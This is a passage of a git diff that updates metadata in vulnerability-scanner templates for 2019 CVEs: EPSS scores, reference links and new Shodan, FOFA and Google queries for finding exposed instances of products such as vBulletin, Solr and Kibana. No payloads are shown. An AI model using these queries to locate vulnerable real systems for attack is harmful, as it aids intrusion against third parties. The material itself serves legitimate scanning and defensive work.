cve,cve2019,packetstorm,wordpress,xss,wp-plugin,wpdownloadmanager - flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 9838f0edb4..6451b4d66f 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -30,6 +30,7 @@ info: vendor: dlink product: dns-320_firmware shodan-query: html:"ShareCenter" + fofa-query: body="sharecenter" tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink http: diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index e8109ac01c..481ab5c4b8 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml @@ -26,6 +26,8 @@ info: max-request: 1 vendor: linuxfoundation product: harbor + shodan-query: http.favicon.hash:657337228 + fofa-query: icon_hash=657337228 tags: cve,cve2019,intrusive,harbor,linuxfoundation http: diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index 40a05482d5..03c8285e4f 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16278 cwe-id: CWE-22 - epss-score: 0.97374 - epss-percentile: 0.99893 + epss-score: 0.97408 + epss-percentile: 0.99926 cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16469.yaml b/http/cves/2019/CVE-2019-16469.yaml index 46dc9a6689..aeaded7539 100644 --- a/http/cves/2019/CVE-2019-16469.yaml +++ b/http/cves/2019/CVE-2019-16469.yaml @@ -28,6 +28,8 @@ info: vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: cve,cve2019,aem,eli,csti variables: num1: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index d8e131f716..8951eeb3ae 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2019,cve,intrusive,rconfig,packetstorm,rce http: diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index 47efcb0933..a17f36a226 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -29,6 +29,8 @@ info: vendor: vbulletin product: vbulletin shodan-query: http.component:"vBulletin" + google-query: intext:"powered by vbulletin" + fofa-query: body="powered by vbulletin" tags: cve,cve2019,rce,kev,seclists,vbulletin http: diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index bb94876d8a..83eb26ec1c 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-16931 cwe-id: CWE-79 - epss-score: 0.00244 - epss-percentile: 0.63842 + epss-score: 0.0016 + epss-percentile: 0.52613 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index 8cdc7790f2..ad952bf0f0 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-16997 cwe-id: CWE-89 - epss-score: 0.28294 - epss-percentile: 0.96427 + epss-score: 0.21998 + epss-percentile: 0.9646 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 4df57d8acb..1853e78164 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -27,6 +27,9 @@ info: max-request: 100 vendor: zabbix product: zabbix + shodan-query: http.favicon.hash:892542951 + fofa-query: icon_hash=892542951 + google-query: intitle:"zabbix-server" tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix http: diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index b0a563e27c..5721c50f2a 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2019-17444 cwe-id: CWE-521 epss-score: 0.05344 - epss-percentile: 0.92917 + epss-percentile: 0.93079 cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:* metadata: max-request: 1 vendor: jfrog product: artifactory framework: "-" + shodan-query: cpe:"cpe:2.3:a:jfrog:artifactory" tags: cve,cve2019,jfrog,default-login,- http: diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index af431413a6..f0f2c59aab 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-17538 cwe-id: CWE-22 - epss-score: 0.00878 - epss-percentile: 0.80703 + epss-score: 0.00811 + epss-percentile: 0.81728 cpe: cpe:2.3:a:jnoj:jiangnan_online_judge:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 3ee9fbb86f..174046ade5 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -27,6 +27,9 @@ info: max-request: 3 vendor: apache product: solr + shodan-query: cpe:"cpe:2.3:a:apache:solr" + fofa-query: title="solr admin" + google-query: intitle:"apache solr" tags: cve,cve2019,kev,packetstorm,apache,rce,solr,oast http: diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 54ec06a2a9..80bc418778 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.1 cve-id: 'CVE-2019-17574' cwe-id: CWE-639 - epss-score: 0.12974 - epss-percentile: 0.95024 + epss-score: 0.11202 + epss-percentile: 0.95166 cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -31,6 +31,8 @@ info: product: popup_maker framework: wordpress publicwww-query: "/wp-content/plugins/popup-maker/" + shodan-query: http.html:/wp-content/plugins/popup-maker/ + fofa-query: body=/wp-content/plugins/popup-maker/ tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic http: diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 4c359c861a..092aec940b 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -30,6 +30,7 @@ info: vendor: cybelsoft product: thinvnc shodan-query: http.favicon.hash:-1414548363 + fofa-query: icon_hash=-1414548363 tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft http: diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index 27763a0edd..6812129e3c 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -18,14 +18,16 @@ info: cvss-score: 9.8 cve-id: CVE-2019-1821 cwe-id: CWE-20 - epss-score: 0.96882 - epss-percentile: 0.99686 + epss-score: 0.96792 + epss-percentile: 0.99681 cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: cisco product: evolved_programmable_network_manager shodan-query: http.title:"prime infrastructure" + fofa-query: title="prime infrastructure" + google-query: intitle:"prime infrastructure" tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco http: diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index 62b60facee..0c182487f7 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -12,13 +12,15 @@ info: - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py - https://nvd.nist.gov/vuln/detail/CVE-2019-18371 + - https://github.com/password520/Penetration_PoC + - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-18371 cwe-id: CWE-22 - epss-score: 0.02376 - epss-percentile: 0.88739 + epss-score: 0.02789 + epss-percentile: 0.90617 cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index f7eabc9243..884b7bef1d 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -13,18 +13,23 @@ info: - https://github.com/igniterealtime/Openfire/pull/1498 - https://swarm.ptsecurity.com/openfire-admin-console/ - https://nvd.nist.gov/vuln/detail/CVE-2019-18393 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2019-18393 cwe-id: CWE-22 epss-score: 0.00161 - epss-percentile: 0.52584 + epss-percentile: 0.52637 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: igniterealtime product: openfire + shodan-query: http.title:"openfire admin console" + fofa-query: title="openfire" + google-query: intitle:"openfire" tags: cve,cve2019,openfire,lfi,igniterealtime http: diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index 31c241abc2..89dc5b1b26 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -13,18 +13,23 @@ info: - https://swarm.ptsecurity.com/openfire-admin-console/ - https://github.com/igniterealtime/Openfire/pull/1497 - https://nvd.nist.gov/vuln/detail/CVE-2019-18394 + - https://github.com/sobinge/nuclei-templates + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-18394 cwe-id: CWE-918 - epss-score: 0.62096 - epss-percentile: 0.97541 + epss-score: 0.70889 + epss-percentile: 0.98041 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: igniterealtime product: openfire + shodan-query: http.title:"openfire admin console" + fofa-query: title="openfire" + google-query: intitle:"openfire" tags: cve,cve2019,ssrf,openfire,oast,igniterealtime http: diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index c7493dedb0..3cb803769b 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -28,6 +28,7 @@ info: vendor: cisco product: rv110w_firmware fofa-query: icon_hash="-646322113" + shodan-query: http.favicon.hash:"-646322113" tags: cve,cve2019,cisco,router,iot http: diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index 5e38f81e01..2d3b16c8c7 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-19368 cwe-id: CWE-79 epss-score: 0.00624 - epss-percentile: 0.78472 + epss-percentile: 0.78891 cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index 9e47b5ea74..6ac759892a 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-20085 cwe-id: CWE-22 epss-score: 0.69009 - epss-percentile: 0.97908 + epss-percentile: 0.9799 cpe: cpe:2.3:o:tvt:nvms-1000_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index cc7ccb3827..6a3e56e3e2 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -12,13 +12,14 @@ info: - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html - https://knassar702.github.io/cve/neon/ - https://nvd.nist.gov/vuln/detail/CVE-2019-20141 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-20141 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.46806 + epss-percentile: 0.47026 cpe: cpe:2.3:a:laborator:neon:2.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index caa2762ebe..0d1d5a74ce 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-20210 cwe-id: CWE-79 epss-score: 0.00938 - epss-percentile: 0.81363 + epss-percentile: 0.83041 cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index e6ded4687b..dc4e62d988 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: artica product: pandora_fms + shodan-query: http.title:"pandora fms" + fofa-query: title="pandora fms" + google-query: intitle:"pandora fms" tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica http: diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 8f2e603c54..0ac744ddd1 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -28,6 +28,8 @@ info: vendor: influxdata product: influxdb shodan-query: InfluxDB + fofa-query: title="influxdb - admin interface" + google-query: intitle:"influxdb - admin interface" tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata http: diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 356485c92b..56e051bd92 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2019-2616 - epss-score: 0.94292 - epss-percentile: 0.99135 + epss-score: 0.94801 + epss-percentile: 0.99268 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index 8499a113b6..86059f5e39 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 - epss-score: 0.97101 - epss-percentile: 0.99761 + epss-score: 0.97069 + epss-percentile: 0.99765 cpe: cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index ddd0b6a263..e4b05c5215 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -28,6 +28,7 @@ info: max-request: 5 vendor: atlassian product: confluence + shodan-query: http.component:"atlassian confluence" tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev variables: num1: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index 1fff86f98c..6aeb1e5a2a 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-3403 cwe-id: CWE-863 epss-score: 0.00379 - epss-percentile: 0.72409 + epss-percentile: 0.72862 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index 57e9e6f394..6ad85ae4f0 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-3799 cwe-id: CWE-22 - epss-score: 0.01441 - epss-percentile: 0.86327 + epss-score: 0.02947 + epss-percentile: 0.90832 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 0d1bd780bb..ed32bcca3a 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -19,13 +19,15 @@ info: cve-id: CVE-2019-3911 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.5643 + epss-percentile: 0.56966 cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:* metadata: max-request: 1 vendor: labkey product: labkey_server shodan-query: 'Server: Labkey' + fofa-query: 'title="sign in: /home"' + google-query: 'intitle:"sign in: /home"' tags: cve,cve2019,xss,labkey,tenable http: diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index 7e2dd681ab..ea223038cf 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -28,6 +28,8 @@ info: vendor: labkey product: labkey_server shodan-query: 'Server: Labkey' + fofa-query: 'title="sign in: /home"' + google-query: 'intitle:"sign in: /home"' tags: cve2019,cve,tenable,redirect,labkey http: diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index e69880e750..fa607c0894 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-3929 cwe-id: CWE-78,CWE-79 - epss-score: 0.97293 - epss-percentile: 0.99855 + epss-score: 0.97363 + epss-percentile: 0.99899 cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index bbeb5c79e5..3b2a4fb1e7 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-5127 cwe-id: CWE-78 epss-score: 0.97409 - epss-percentile: 0.99922 + epss-percentile: 0.99928 cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index 9643d6652c..b2cc82e5b9 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: rubyonrails product: rails + shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails http: diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index aabe21db32..df24f87f58 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -30,6 +30,8 @@ info: vendor: revive-sas product: revive_adserver shodan-query: http.favicon.hash:106844876 + fofa-query: icon_hash=106844876 + google-query: intitle:"revive adserver" tags: cve,cve2019,edb,packetstorm,revive,adserver,rce,revive-sas http: diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index c63fc8341f..88c9839a3b 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-6112 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46229 + epss-percentile: 0.47188 cpe: cpe:2.3:a:graphpaperpress:sell_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index da47434b5b..7c78ae9895 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.1 cve-id: CVE-2019-6340 cwe-id: CWE-502 - epss-score: 0.97487 - epss-percentile: 0.9997 + epss-score: 0.97451 + epss-percentile: 0.9995 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index 4ff679ed66..69c29fdb54 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-6715 - epss-score: 0.23312 - epss-percentile: 0.96449 + epss-score: 0.3388 + epss-percentile: 0.97075 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index 697808948e..923762042a 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -32,6 +32,7 @@ info: shodan-query: title:"phpmyadmin" fofa-query: body="pma_servername" && body="4.8.4" hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" + google-query: intitle:"phpmyadmin" tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli http: diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 256e3eeb8a..5530d65be2 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -28,6 +28,7 @@ info: vendor: python product: pypiserver shodan-query: html:"pypiserver" + fofa-query: body="pypiserver" tags: cve,cve2019,crlf,pypiserver,python http: diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index 54e5da5d21..317c6cbaa6 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -30,6 +30,8 @@ info: vendor: qnap product: photo_station shodan-query: 'Content-Length: 580 "http server 1.0"' + fofa-query: title="photo station" + google-query: intitle:"qnap" tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss http: diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index ae03168b7b..ae5c95c0c9 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-7219 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.43765 + epss-percentile: 0.44665 cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index bf2669d2f9..028a16d634 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -20,12 +20,13 @@ info: cvss-score: 9.8 cve-id: CVE-2019-7238 epss-score: 0.974 - epss-percentile: 0.99915 + epss-percentile: 0.9992 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sonatype product: nexus + fofa-query: title="nexus repository manager" tags: cve,cve2019,nexus,rce,kev,sonatype http: diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 0019bd0da1..e7f6e08a9f 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: nortekcontrol product: linear_emerge_essential_firmware + shodan-query: http.title:"emerge" + fofa-query: title="emerge" + google-query: intitle:"emerge" tags: cve,cve2019,emerge,lfi,edb,packetstorm,nortekcontrol http: diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index 9a0ccd103b..a1978abcfa 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -30,6 +30,8 @@ info: vendor: nortekcontrol product: linear_emerge_essential_firmware shodan-query: http.title:"eMerge" + fofa-query: title="emerge" + google-query: intitle:"emerge" tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol http: diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index a12bf0c6d3..7c4bc35199 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -21,8 +21,8 @@ info: cvss-score: 10 cve-id: CVE-2019-7256 cwe-id: CWE-78 - epss-score: 0.97388 - epss-percentile: 0.99904 + epss-score: 0.97443 + epss-percentile: 0.99947 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,7 +30,9 @@ info: vendor: nortekcontrol product: linear_emerge_essential_firmware shodan-query: title:"eMerge" - tags: cve,cve2019,emerge,rce,edb,nortekcontrol + fofa-query: title="emerge" + google-query: intitle:"emerge" + tags: cve,cve2019,emerge,rce,edb,nortekcontrol,kev variables: file: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index dbb2045f39..77d5d5b8ca 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -19,13 +19,13 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7315 cwe-id: CWE-22 - epss-score: 0.0172 - epss-percentile: 0.87556 - cpe: cpe:2.3:o:genieaccess:wip3bvaf_firmware:*:*:*:*:*:*:*:* + epss-score: 0.0143 + epss-percentile: 0.86533 + cpe: cpe:2.3:h:genieaccess:wip3bvaf:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: genieaccess - product: wip3bvaf_firmware + product: wip3bvaf tags: cve,cve2019,camera,genie,lfi,iot,genieaccess http: diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 5a2f4eef04..4ab0d87e0c 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: elastic product: kibana + shodan-query: http.title:"kibana" + fofa-query: title="kibana" + google-query: intitle:"kibana" tags: cve,cve2019,kibana,rce,kev,elastic http: diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 6555a9c9be..792103fc01 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -30,6 +30,8 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: cve,cve2019,aem,adobe http: diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index d063a60bba..ccd06cac6c 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -15,13 +15,14 @@ info: - http://qdpm.net/download-qdpm-free-project-management - 